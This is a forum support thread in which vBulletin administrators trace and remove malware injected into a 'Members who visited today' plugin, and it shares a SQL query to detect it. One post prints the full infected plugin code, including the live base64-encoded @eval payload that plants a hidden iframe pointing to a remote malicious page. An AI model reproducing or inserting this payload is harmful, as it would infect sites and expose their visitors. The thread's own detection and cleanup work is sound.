|
#11
|
|||
|
|||
Your screenshot in https://vborg.vbsupport.ru/showpost....49&postcount=6 shows a Thank You plugin at the global_setup_complete hook.
There is no Thank You plugin that's using that hook. To blame the Thank You hack for this seems misguided. You were hacked by tapatalk. Lord knows what else got corrupted in the process. |
#12
|
||||
|
||||
I would like to thank someDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.
I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code. Searching my datastore table just now, it appears that they inserted it in one of my plugins. This is as far as I have gotten, but I am very encouraged to find a match to the code you posted. THANK YOU. I owe you some beers. caliman --------------- Added [DATE]1277699440[/DATE] at [TIME]1277699440[/TIME] --------------- In my case it was the 'Members who visited today' plugin that got infected. The global_start hook: Code:
// Code of a global_start hook plugin as the poster found it stored on an
// infected forum. Everything inside the if ($show['wvt']) block builds the
// "visited today" display; the final @eval(base64_decode(...)) statement sits
// outside that block and is the obfuscated statement the thread is about.
if ($show['wvt']) {
    // Pick the activity cutoff: a rolling 24 hours, or the elapsed part of the
    // current day taken from the HH, MM and SS fields of an adjusted timestamp.
    if ($vbulletin->options['wvt24']) {
        $cutoff = TIMENOW - 86400;
        $whodesc = $vbphrase['wvt_visited_today_24'];
    } else {
        $whodesc = $vbphrase['wvt_visited_today'];
        // presumably 'hourdiff' is the forum's clock offset in seconds — confirm
        $tnow = date('YmdHis',TIMENOW - intval($vbulletin->options['hourdiff']));
        $cutoff = TIMENOW - (substr($tnow,8,2)*3600 + substr($tnow,10,2)*60 + substr($tnow,12,2));
    }
    unset ($whotoday);
    $show['loggedinusers'] = true;
    if ($vbulletin->options['wvtnames']) {
        // $cutoff is interpolated into the SQL text; in this listing it is built
        // only from TIMENOW and numeric pieces of a date() string, not request input.
        $todaysusers = $vbulletin->db->query_read_slave(" SELECT * FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity) WHERE lastactivity > $cutoff ORDER BY username ");
        $totaltoday = 0;
        while ($today = $vbulletin->db->fetch_array($todaysusers)) {
            $totaltoday += 1;
            $today['markinv'] = '';
            // NOTE(review): unquoted key; this relies on PHP reading the bareword as
            // the string 'visible', unlike the quoted uses a few lines below.
            $today[visible] = true ;
            // Users flagged invisible are hidden unless the viewer has the
            // canseehidden permission or is that user; those are marked with '*'.
            if ($today['options'] & $vbulletin->bf_misc_useroptions['invisible']) {
                $today['visible'] = false ;
                if (($vbulletin->userinfo['permissions']['genericpermissions'] & $vbulletin->bf_ugp_genericpermissions['canseehidden']) OR $today['userid'] == $vbulletin->userinfo['userid']) {
                    $today['markinv'] = '*';
                    $today['visible'] = true ;
                }
            }
            if ($today['visible']) {
                // Use the display group when one is set, else the primary usergroup.
                $ugroup = ($today['displaygroupid'] > 0 ? $today['displaygroupid'] : $today['usergroupid']);
                $today['opentag'] = $vbulletin->usergroupcache[$ugroup]['opentag'];
                $today['closetag'] = $vbulletin->usergroupcache[$ugroup]['closetag'];
                $today['wrdate'] = vbdate($vbulletin->options['timeformat'], $today['lastactivity']);
                // The template text returned by fetch_template() is executed as PHP
                // here, so whoever can edit that template can run code in this hook.
                eval('$whotoday .= "' . fetch_template('Display_Visitors_User') . '" . 
", ";');
            }
        }
        if ($whotoday) {
            // Drop the trailing ", " left by the loop above.
            $whotoday = substr($whotoday, 0, -2);
        } else {
            $whotoday = $vbphrase['wvt_no_visitors'];
        }
    } else {
        // Names are switched off: only count the users active since the cutoff.
        $todaysusers = $vbulletin->db->query_first_slave(" SELECT COUNT(lastactivity) AS whotoday FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity) WHERE lastactivity > $cutoff ");
        $totaltoday = $todaysusers['whotoday'];
        $whotoday = $vbphrase['wvt_no_visitors_display'];
    }
    if ($vbulletin->options['wvtcol']) {
        $vbcollapse['collapseimg_forumhome_todayusers'] = '_collapsed';
        $vbcollapse['collapseobj_forumhome_todayusers'] = 'display:none;';
    }
    $ftotaltoday = vb_number_format($totaltoday);
    $whotitle = construct_phrase($whodesc,$ftotaltoday);
    $pid = 'paulm_wvt_37';
    if ($pemdata37['set'] == true) {
        $data_wvt =& $pemdata37[$pid];
    } else {
        // NOTE(review): unserialize() runs on a value read from the options array;
        // it is only as trustworthy as whatever can write that option.
        if ($pemdata37 = unserialize($vbulletin->options['pemdata37'])) {
            $pemdata37['set'] = true;
            $data_wvt =& $pemdata37[$pid];
        } else {
            $data_wvt = array('version' => 'N/A');
        }
    }
    if ($vbulletin->options['enable_wvt']) {
        // Append the Display_Visitors template after the marker text inside the
        // cached template named by the 'template_wvt' option.
        $vbulletin->templatecache["{$vbulletin->options['template_wvt']}"] = str_replace($vbulletin->options['text_wvt'], $vbulletin->options['text_wvt'].$vbulletin->templatecache['Display_Visitors'],$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"]);
    }
    if ($vbulletin->options['wvtmost']) {
        if (empty($vbulletin->maxloggedin)) {
            if (method_exists($vbulletin->datastore,'do_fetch')) {
                // Datastore extension exists, use it
                $vbulletin->datastore->do_fetch('maxloggedin',$errors);
                if ($errors[0]) {
                    // Fetch failed, use original datastore
                    $vbulletin->datastore->do_db_fetch("'maxloggedin'");
                }
            } else {
                // No extension, use original datastore
                $vbulletin->datastore->do_db_fetch("'maxloggedin'");
            }
        }
        // Store a new record when today's total exceeds the saved maximum.
        if ($totaltoday > intval($vbulletin->maxloggedin['maxvisitors'])) {
            $vbulletin->maxloggedin['maxvisitorsdate'] = TIMENOW;
            $vbulletin->maxloggedin['maxvisitors'] = $totaltoday;
            build_datastore('maxloggedin', serialize($vbulletin->maxloggedin),1);
        }
        // Repeats the enclosing 'wvtmost' test, so it is always true at this point.
        if ($vbulletin->options['wvtmost']) {
            if ($vbulletin->options['wvt24']) {
                $description = $vbphrase['wvt_members_24'];
            } else {
                $description = $vbphrase['wvt_members_day'];
            }
            $visitors = construct_phrase( $description, vb_number_format($vbulletin->maxloggedin['maxvisitors']), vbdate( $vbulletin->options['dateformat'], $vbulletin->maxloggedin['maxvisitorsdate'], true ), vbdate( $vbulletin->options['timeformat'], $vbulletin->maxloggedin['maxvisitorsdate'] ) );
            $whotoday = $visitors . "<br />" . $whotoday;
        }
    }
}
// Obfuscated statement, kept verbatim as the sample to search for. It is outside
// the if ($show['wvt']) block, so it runs whenever this hook code runs, and the
// leading @ suppresses any error output from it.
// Decoded, the string is PHP that does nothing when the cookie 'xlov' is already
// set; otherwise, when the request's User-Agent contains one of a list of browser
// names, it assigns to $devb a <script> that sets that cookie and a 1x1 <iframe>
// whose src is hxxp://www.gettiao[.]co[.]cc/pl.php (defanged here). Nothing in
// this listing prints $devb, so where that markup is output is not visible here.
// NOTE(review): a LIKE '%base64_decode%' search finds this encoding only, and
// deleting the statement does not show how it was written into the plugin table.
@eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlF JywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01l ZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDov L3d3dy5nZXR0aWFvLmNvLmNjL3BsLnBocCI7DQpmb3JlYWNoICgkeGIgYXMgJHhiYikgew0KaWYo c3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2Vy KCR4YmIpKSkgew0KJGRldmIgPSA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jdGlvbiBTZXRDb29raWUo Y29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2llUGF0aCA9ICcvJzsNCiB2YXIg ZXhwRGF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdldFRpbWUoKSsz NzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KIGRvY3Vt ZW50LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIjtwYXRoPSIr ZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJ4 bG92IiwgImRheSIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbWU9IiRpZnJhbmQiIHdpZHRoPSIx IiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZGVyPSJubyIgbWFyZ2lud2lkdGg9 IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZnJhbWU+DQpISko7DQpicmVhazsN CiB9DQogfQ0KfQ=="));
Uninstalling the plugin did the trick. This also rebuilds the datastore. You can search your database to look for this code by doing this: Code:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%"; Hope this helps someone. This has been absolutely brutal. caliman |
#13
|
|||
|
|||
Glad I could help you find that code caliman
djbaxter: The Post thanks mod was only a guess. I have way too many things going on to really dig into it very much. I did notice that the tapatalk plugin was updated on 06/25/2010 though. --------------- Added [DATE]1277730343[/DATE] at [TIME]1277730343[/TIME] --------------- What I did was go into plugins & products --> product manager. Then I found the part of the plugin that had the code and just deleted the code |
#14
|
||||
|
||||
Thanks again. I was serious about the beer.
I have confirmed that this removed the exploit from my site. |
#15
|
|||
|
|||
Thanks to both of you. While my forum wasn't showing any symptoms, I did the search using phpMyAdmin and verified that the exploit was not present on my forums.